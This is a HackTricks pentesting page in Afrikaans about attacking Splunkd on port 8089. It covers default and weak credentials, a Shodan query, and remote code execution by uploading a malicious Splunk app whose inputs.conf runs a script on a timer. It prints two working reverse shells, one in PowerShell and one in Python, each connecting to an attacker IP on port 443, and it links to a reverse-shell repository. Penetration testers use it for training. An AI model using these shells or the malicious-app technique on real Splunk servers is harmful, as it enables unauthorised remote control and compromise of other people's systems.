maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/8089-splunkd.md

120 lines
4.1 KiB
Markdown
Raw Blame History

# 8089 - Pentesting Splunkd
{{#include ../banners/hacktricks-training.md}}
## **Basiese Inligting**
- Log analitiese hulpmiddel wat gebruik word vir data-insameling, analise en visualisering
- Gewoonlik gebruik in sekuriteitsmonitering en besigheidsanalise
- Standaard poorte:
- Webbediener: 8000
- Splunkd diens: 8089
### Kwetsbaarheid Vektore:
1. Gratis Weergawe Exploitatie
- Proefweergawe omskakel outomaties na gratis weergawe na 60 dae
- Gratis weergawe ontbreek outentisering
- Potensiële sekuriteitsrisiko as dit onbeheerd gelaat word
- Administrateurs mag sekuriteitsimplikasies oor die hoof sien
2. Kredensiaal Swakhede
- Ou weergawe: Standaard kredensiale `admin:changeme`
- Nuwe weergawes: Kredensiale ingestel tydens installasie
- Potensiaal vir swak wagwoord gebruik (bv. `admin`, `Welcome`, `Password123`)
3. Afgeleë Kode Uitvoering Geleenthede
- Meerdere kode uitvoeringsmetodes:
- Bediener-kant Django toepassings
- REST eindpunte
- Geskryfde insette
- Waarskuwingskripte
- Kruis-platform ondersteuning (Windows/Linux)
- Geskryfde insette kan loop:
- Bash skripte
- PowerShell skripte
- Batch skripte
Sleutel Exploitatie Potensiaal:
- Sensitiewe data stoor
- Gebrek aan outentisering in gratis weergawe
- Meerdere vektore vir potensiële afgeleë kode uitvoering
- Moontlikheid om geskrifte insette te benut vir stelselskompromie
### Shodan
- `Splunk build`
## RCE
### Skep Aangepaste Toepassing
Splunk bied 'n gesofistikeerde metode vir afgeleë kode uitvoering deur aangepaste toepassingsontplooiing, wat sy kruis-platform skripting vermoëns benut. Die kern exploitatie tegniek draai om die skep van 'n kwaadwillige toepassing wat omgekeerde skale op beide Windows en Linux stelsels kan uitvoer.
'n Aangepaste toepassing kan **Python, Batch, Bash, of PowerShell skripte** uitvoer. Boonop, **Splunk kom met Python geïnstalleer**, so selfs in **Windows** stelsels sal jy in staat wees om python kode uit te voer.
Jy kan [**hierdie**](https://github.com/0xjpuff/reverse_shell_splunk) voorbeeld gebruik met die **`bin`** wat 'n voorbeeld bevat vir [Python](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py) en [PowerShell](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1). Of jy kan jou eie skep.
Die exploitatie proses volg 'n konsekwente metodologie oor platforms:
```
splunk_shell/
├── bin (reverse shell scripts)
└── default (inputs.conf configuration)
```
Die kritieke konfigurasie lêer `inputs.conf` aktiveer die skrip deur:
- `disabled = 0` in te stel
- 'n 10-sekonde uitvoeringsinterval te konfigureer
- Die skrip se brontipe te definieer
Ontplooiing is eenvoudig:
1. Skep die kwaadwillige toepassingspakket
2. Stel 'n luisteraar (Netcat/socat) op die aanvalmasjien in
3. Laai die toepassing op deur Splunk se koppelvlak
4. Trigger outomatiese skripuitvoering by oplaai
Voorbeeld Windows PowerShell omgekeerde skulp:
```bash
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
```
Voorbeeld Linux Python omgekeerde dop:
```python
import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')
```
### RCE & Privilege Escalation
In die volgende bladsy kan jy 'n verduideliking vind oor hoe hierdie diens misbruik kan word om voorregte te verhoog en volharding te verkry:
{{#ref}}
../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
{{#endref}}
## References
- [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink